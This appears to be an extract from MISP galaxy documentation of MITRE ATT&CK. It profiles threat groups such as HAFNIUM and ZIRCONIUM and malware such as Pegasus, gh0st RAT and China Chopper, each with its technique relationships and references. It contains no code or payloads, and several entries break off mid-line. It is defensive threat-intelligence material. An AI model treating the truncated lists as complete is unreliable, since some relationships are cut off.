[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)

The tag is: `misp-galaxy:mitre-intrusion-set="HAFNIUM - G0125"`

HAFNIUM - G0125 is also known as:

- HAFNIUM
- Operation Exchange Marauder

HAFNIUM - G0125 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"` with estimative-
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<td><a href="https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/">https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/</a></td>
</tr>
</tbody>
</table>

**Higaisa - G0126**

[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean
origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Higaisa - G0126"`

Higaisa - G0126 is also known as:

- Higaisa

Higaisa - G0126 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/groups/G0126">https://attack.mitre.org/groups/G0126</a></td>
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<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/">https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/</a></td>
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<tr>
<td><a href="https://www.zscaler.com/blogs/security-research/return-higaisa-apt">https://www.zscaler.com/blogs/security-research/return-higaisa-apt</a></td>
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</tbody>
</table>
ZIRCONIUM - G0128

[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)

The tag is: misp-galaxy:mitre-intrusion-set="ZIRCONIUM - G0128"

ZIRCONIUM - G0128 is also known as:

- ZIRCONIUM
- APT31

ZIRCONIUM - G0128 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"


**Table 4386. Table References**

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<td><a href="https://attack.mitre.org/groups/G0128">https://attack.mitre.org/groups/G0128</a></td>
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<td><a href="https://research.checkpoint.com/2021/the-story-of-jian/">https://research.checkpoint.com/2021/the-story-of-jian/</a></td>
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</table>

**Malware**

Name of ATT&CK software.

![Malware is a cluster galaxy available in JSON format at this location](image)

The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

MITRE
Hacking Team UEFI Rootkit - S0047

[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)

The tag is: `misp-galaxy:mitre-malware="Hacking Team UEFI Rootkit - S0047"`

Hacking Team UEFI Rootkit - S0047 is also known as:

- Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit - S0047 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Rootkit - T1014"` with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0047">https://attack.mitre.org/software/S0047</a></td>
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</table>

X-Agent for Android - S0314

[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).

The tag is: `misp-galaxy:mitre-malware="X-Agent for Android - S0314"`

X-Agent for Android - S0314 is also known as:

- X-Agent for Android

X-Agent for Android - S0314 has relationships with:

- similar: `misp-galaxy:tool="CHOPSTICK"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="X-Agent"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="X-Agent (Android)"` with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0314">https://attack.mitre.org/software/S0314</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf">https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf</a></td>
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</table>

Red Alert 2.0 - S0539

[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0)

The tag is: `misp-galaxy:mitre-malware="Red Alert 2.0 - S0539"`

Red Alert 2.0 - S0539 is also known as:

• Red Alert 2.0

Red Alert 2.0 - S0539 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="UncommonlyUsed Port - T1509" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0539">https://attack.mitre.org/software/S0539</a></td>
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</table>

**Exaramel for Linux - S0401**

[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343). (Citation: ESET TeleBots Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Exaramel for Linux - S0401"`

Exaramel for Linux - S0401 is also known as:

• Exaramel for Linux

Exaramel for Linux - S0401 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-
Winnti for Linux - S0430

[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: **misp-galaxy:mitre-malware="Winnti for Linux - S0430"**

Winnti for Linux - S0430 is also known as:

- Winnti for Linux

Winnti for Linux - S0430 has relationships with:

- uses: **misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Rootkit - T1014"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"** with estimative-
XLoader for iOS - S0490

[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information. (Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).

The tag is: `misp-galaxy:mitre-malware="XLoader for iOS - S0490"`

XLoader for iOS - S0490 is also known as:

- XLoader for iOS

XLoader for iOS - S0490 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"


groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430). (Citation: Chronicle Winnti for Linux May 2019)

The tag is: `misp-galaxy:mitre-malware="Winnti for Windows - S0141"`

Winnti for Windows - S0141 is also known as:

- Winnti for Windows

Winnti for Windows - S0141 has relationships with:

- similar: `misp-galaxy:tool="Winnti"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Winnti (Windows)"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0141">https://attack.mitre.org/software/S0141</a></td>
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<td><a href="https://securelist.com/winnti-more-than-just-a-game/37029/">https://securelist.com/winnti-more-than-just-a-game/37029/</a></td>
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<td><a href="https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a">https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a</a></td>
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**Pegasus for Android - S0316**

[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).

The tag is: `misp-galaxy:mitre-malware="Pegasus for Android - S0316"`

Pegasus for Android - S0316 is also known as:
• Pegasus for Android
• Chrysaor

Pegasus for Android - S0316 has relationships with:

• similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0316">https://attack.mitre.org/software/S0316</a></td>
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<tr>
<td><a href="https://blog.lookout.com/blog/2017/04/03/pegasus-android/">https://blog.lookout.com/blog/2017/04/03/pegasus-android/</a></td>
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</tbody>
</table>
XLoader for Android - S0318

[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application. (Citation: TrendMicro-XLoader-FakeSpy) (Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).

The tag is: `misp-galaxy:mitre-malware="XLoader for Android - S0318"`

XLoader for Android - S0318 is also known as:

- XLoader for Android

XLoader for Android - S0318 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0318">https://attack.mitre.org/software/S0318</a></td>
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</table>
Pegasus for iOS - S0289

[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

The tag is: *misp-galaxy:mitre-malware="Pegasus for iOS - S0289"

Pegasus for iOS - S0289 is also known as:

- Pegasus for iOS

Pegasus for iOS - S0289 has relationships with:

- similar: *misp-galaxy:tool="Chrysaor"* with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia="Chrysaor"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Capture Audio - T1429"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"* with estimative-
Exaramel for Windows - S0343

[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Exaramel for Windows - S0343"`

Exaramel for Windows - S0343 is also known as:

- Exaramel for Windows

Exaramel for Windows - S0343 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
P.A.S. Webshell - S0598

[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers. (Citation: ANSSI Sandworm January 2021)

The tag is: `misp-galaxy:mitre-malware="P.A.S. Webshell - S0598"`

P.A.S. Webshell - S0598 is also known as:

- P.A.S. Webshell
- Fobushell

P.A.S. Webshell - S0598 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
gh0st RAT - S0032

[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)

The tag is: `misp-galaxy:mitre-malware="gh0st RAT - S0032"`

gh0st RAT - S0032 is also known as:

- gh0st RAT

gh0st RAT - S0032 has relationships with:

- similar: `misp-galaxy:tool="gh0st"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0032">https://attack.mitre.org/software/S0032</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html">https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html</a></td>
</tr>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/">https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/</a></td>
</tr>
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</table>
**China Chopper - S0020**

[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)

The tag is: *misp-galaxy:mitre-malware="China Chopper - S0020"*

China Chopper - S0020 is also known as:

- China Chopper

China Chopper - S0020 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0020">https://attack.mitre.org/software/S0020</a></td>
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<td><a href="https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage">https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage</a></td>
</tr>
</tbody>
</table>
**Skeleton Key - S0007**

[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).

The tag is: `misp-galaxy:mitre-malware="Skeleton Key - S0007"

Skeleton Key - S0007 is also known as:

- Skeleton Key

Skeleton Key - S0007 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001"` with estimative-language:likelihood-probability="almost-certain"

**Table 4401. Table References**

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<td><a href="https://attack.mitre.org/software/S0007">https://attack.mitre.org/software/S0007</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/skeleton-key-malware-analysis">https://www.secureworks.com/research/skeleton-key-malware-analysis</a></td>
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</table>

**P2P ZeuS - S0016**

[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)

The tag is: `misp-galaxy:mitre-malware="P2P ZeuS - S0016"

P2P ZeuS - S0016 is also known as:

- P2P ZeuS
- Peer-to-Peer ZeuS
- Gameover ZeuS

P2P ZeuS - S0016 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"` with estimative-language:likelihood-probability="almost-certain"

**Table 4402. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0016">https://attack.mitre.org/software/S0016</a></td>
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</table>
**Unknown Logger - S0130**

[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)

The tag is: `misp-galaxy:mitre-malware="Unknown Logger - S0130"`

Unknown Logger - S0130 is also known as:

- Unknown Logger

Unknown Logger - S0130 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with estimative-language:likelihood-probability="almost-certain"
